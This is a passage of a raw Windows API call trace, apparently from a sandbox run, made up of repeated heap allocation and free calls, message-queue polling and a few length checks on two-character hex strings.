[0145.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0145.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9468 | out: hHeap=0x25c0000) returned 1 [0145.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.316] lstrlenW (lpString="74") returned 2 [0145.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92a0 | out: hHeap=0x25c0000) returned 1 [0145.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0145.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93a8 | out: hHeap=0x25c0000) returned 1 [0145.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93d8 | out: hHeap=0x25c0000) returned 1 [0145.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12c8 | out: hHeap=0x25c0000) returned 1 [0145.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93d8 [0145.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93a8 [0145.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12c8 [0145.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9408 | out: hHeap=0x25c0000) returned 1 [0145.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12b8 | out: hHeap=0x25c0000) returned 1 [0145.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93a8 | out: hHeap=0x25c0000) returned 1 [0145.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12c8 | out: hHeap=0x25c0000) returned 1 [0145.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93d8 | out: hHeap=0x25c0000) returned 1 [0145.316] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.316] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12c8 [0145.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93d8 [0145.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93a8 [0145.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12b8 [0145.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9408 [0145.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0145.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92a0 [0145.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9468 [0145.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0145.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9438 [0145.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9450 [0145.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12e8 [0145.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93f0 [0145.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9468 | out: hHeap=0x25c0000) returned 1 [0145.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92a0 | out: hHeap=0x25c0000) returned 1 [0145.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0145.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9438 | out: hHeap=0x25c0000) returned 1 [0145.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0145.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.317] lstrlenW (lpString="64") returned 2 [0145.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9450 | out: hHeap=0x25c0000) returned 1 [0145.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93f0 | out: hHeap=0x25c0000) returned 1 [0145.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9408 | out: hHeap=0x25c0000) returned 1 [0145.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12b8 | out: hHeap=0x25c0000) returned 1 [0145.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9408 [0145.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12b8 [0145.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93a8 | out: hHeap=0x25c0000) returned 1 [0145.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93d8 | out: hHeap=0x25c0000) returned 1 [0145.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12c8 | out: hHeap=0x25c0000) returned 1 [0145.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12b8 | out: hHeap=0x25c0000) returned 1 [0145.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9408 | out: hHeap=0x25c0000) returned 1 [0145.318] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.318] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12b8 [0145.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9408 [0145.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12c8 [0145.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93d8 [0145.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93a8 [0145.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93f0 [0145.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9450 [0145.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0145.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9438 [0145.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0145.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92a0 [0145.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12d8 [0145.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9468 [0145.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0145.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9450 | out: hHeap=0x25c0000) returned 1 [0145.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9438 | out: hHeap=0x25c0000) returned 1 [0145.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0145.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93f0 | out: hHeap=0x25c0000) returned 1 [0145.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.319] lstrlenW (lpString="6C") returned 2 [0145.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92a0 | out: hHeap=0x25c0000) returned 1 [0145.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9468 | out: hHeap=0x25c0000) returned 1 [0145.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93a8 | out: hHeap=0x25c0000) returned 1 [0145.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93d8 | out: hHeap=0x25c0000) returned 1 [0145.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12c8 | out: hHeap=0x25c0000) returned 1 [0145.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93d8 [0145.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93a8 [0145.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12c8 [0145.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9408 | out: hHeap=0x25c0000) returned 1 [0145.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12b8 | out: hHeap=0x25c0000) returned 1 [0145.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93a8 | out: hHeap=0x25c0000) returned 1 [0145.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12c8 | out: hHeap=0x25c0000) returned 1 [0145.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93d8 | out: hHeap=0x25c0000) returned 1 [0145.320] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.320] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12c8 [0145.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93d8 [0145.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93a8 [0145.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12b8 [0145.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9408 [0145.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9468 [0145.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92a0 [0145.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93f0 [0145.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0145.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9438 [0145.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9450 [0145.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12e8 [0145.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0145.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93f0 | out: hHeap=0x25c0000) returned 1 [0145.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92a0 | out: hHeap=0x25c0000) returned 1 [0145.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0145.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9438 | out: hHeap=0x25c0000) returned 1 [0145.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9468 | out: hHeap=0x25c0000) returned 1 [0145.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.321] lstrlenW (lpString="6C") returned 2 [0145.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9450 | out: hHeap=0x25c0000) returned 1 [0145.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0145.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9408 | out: hHeap=0x25c0000) returned 1 [0145.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12b8 | out: hHeap=0x25c0000) returned 1 [0145.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9408 [0145.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12b8 [0145.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93a8 | out: hHeap=0x25c0000) returned 1 [0145.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93d8 | out: hHeap=0x25c0000) returned 1 [0145.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12c8 | out: hHeap=0x25c0000) returned 1 [0145.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12b8 | out: hHeap=0x25c0000) returned 1 [0145.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9408 | out: hHeap=0x25c0000) returned 1 [0145.322] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.322] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12b8 [0145.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9408 [0145.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12c8 [0145.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93d8 [0145.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93a8 [0145.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0145.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9450 [0145.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9468 [0145.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9438 [0145.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0145.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92a0 [0145.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12d8 [0145.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93f0 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9468 | out: hHeap=0x25c0000) returned 1 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9450 | out: hHeap=0x25c0000) returned 1 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9438 | out: hHeap=0x25c0000) returned 1 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.323] lstrlenW (lpString="2E") returned 2 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92a0 | out: hHeap=0x25c0000) returned 1 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93f0 | out: hHeap=0x25c0000) returned 1 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93a8 | out: hHeap=0x25c0000) returned 1 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93d8 | out: hHeap=0x25c0000) returned 1 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12c8 | out: hHeap=0x25c0000) returned 1 [0145.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93d8 [0145.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93a8 [0145.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12c8 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9408 | out: hHeap=0x25c0000) returned 1 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12b8 | out: hHeap=0x25c0000) returned 1 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93a8 | out: hHeap=0x25c0000) returned 1 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12c8 | out: hHeap=0x25c0000) returned 1 [0145.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93d8 | out: hHeap=0x25c0000) returned 1 [0145.324] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.324] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12c8 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93d8 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93a8 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12b8 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9408 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a93f0 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92a0 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0145.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9438 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12e8 [0145.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9450 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12e8 [0145.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9468 [0145.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0145.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92a0 | out: hHeap=0x25c0000) returned 1 [0145.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0145.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9438 | out: hHeap=0x25c0000) returned 1 [0145.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93f0 | out: hHeap=0x25c0000) returned 1 [0145.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.325] lstrlenW (lpString="64") returned 2 [0145.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9450 | out: hHeap=0x25c0000) returned 1 [0145.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9468 | out: hHeap=0x25c0000) returned 1 [0145.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9408 | out: hHeap=0x25c0000) returned 1 [0145.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12b8 | out: hHeap=0x25c0000) returned 1 [0145.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9408 [0145.325] RtlAllocateHeap 